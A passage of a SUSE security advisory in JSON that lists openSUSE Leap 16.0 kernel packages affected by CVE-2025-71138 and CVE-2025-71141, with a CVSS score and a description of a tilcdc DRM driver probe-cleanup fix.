"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
